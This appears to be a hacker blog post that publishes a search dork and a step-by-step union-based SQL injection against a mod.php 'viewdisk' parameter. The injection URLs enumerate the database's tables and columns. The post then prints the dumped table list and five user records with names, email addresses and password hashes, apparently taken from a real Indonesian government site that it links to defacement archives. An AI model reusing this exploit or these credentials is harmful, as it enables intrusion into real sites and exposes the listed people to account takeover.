dork mod.php?mod=disk&op= viewdisk&did= LOL1ds SQLi

++++++++++++++++++++++
./ author : LOL1ds
./ Push : LOL1ds[at]hackermail[dot]com
./ Target : http://localhost/mod.php?mod=
./ dork : mod.php?mod=diskus&op=viewdisk&did=target Vuln
++++++++++++++++++++++

info:
./ http://localhost/mod.php?mod=LoL1ds&op=viewdisk&did=177
./ server : Apache/2.2.17 (Unix)
mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4
./ db serv: MySQLi

++++++++++++++++++++++

exp:
./ http://localhost/mod.php?mod=LoL1ds&op=viewdisk&did=177
./ http://localhost/mod.php?mod=LoL1ds&op=viewdisk&did=177
+order+by+1,2,3,4,5,6,7--
./ http://localhost/mod.php?mod=LoL1ds&op=viewdisk&did=177
+union+select+1,2,group_concat(table_name),4,5,6,7+from
+information_schema.tables+where+table_schema=database()--
./ http://localhost/mod.php?mod=LoL1ds&op=viewdisk&did=177
+union+select+1,2,group_concat(column_name),4,5,6,7+from
+information_schema.columns+where+table_name=0xLOL--
++++++++++++++++++++++

./ inject db: authors,banner,bannerclient,bannerfinish,counter,
lblocks,main_page_content,menu,mod_,mod__categories,
mod__response,mod_katalog,mod_katalog_categories,
mod_katalog_validate,mod_poll_comments,mod_poll_data,
mod_poll_flag,mod_publisher,mod_publisher_categories,
mod_publisher_media,mod_publisher_submit,mod_userpage_data,
modules,new_referer,rblocks,users

./ from table "author"
./ usrname | email | pwd
db:
- Yulia,yuliaxxx@leveragetips.com,5b91a8d8c8628a9ce6accad8f70c4b46
- Dr.Surxxx,surxxx@yahoo.com,2a4b0fd7a24bdcd399bbb2e434c6c2db
- Dr.Surna,dr_surna@yahoo.com,c29d57be16307e2e10a4dcbfd5ebb279
- Admin,webmaster@localhost.com,3a704ee63752d88b14d2fb72c3e3df8d ..w000tttz!!
- Dr. Suriah,suriah@hotmail.com,5b91a8d8c8628a9ce6accad8f70c4b46

++++++++++++++++++++++++++
./admin:
./http://localhost/admin.php
++++++++++++++++++++++++++
./ deptan.go.id zone-h.org | deface.us
++++++++++++++++++++++++++

greaattzz to :

./Allah S.W.T
./moxer_crew | mbah | kojack | cute | gungz_andrew | di0 | s4m_dudunkz | 1Ch43.
./indonesianhacker team,surabayahackerlink,indonesiancoder,
jatimcrew,jogyacarderlink,devilzc0de,revengehack.
./all my preen! sorry i lost ur nem..


tag : SQL, injection, hacking, cracking, Vuln.

Article information: Description: dork mod.php?mod=disk&op= viewdisk&did= LOL1ds SQLi Rating: 4.5 - Reviewer: LolidsOfficialBlog - ItemReviewed: dork mod.php?mod=disk&op= viewdisk&did= LOL1ds SQLi

Related Tips, Tricks and Tutorials :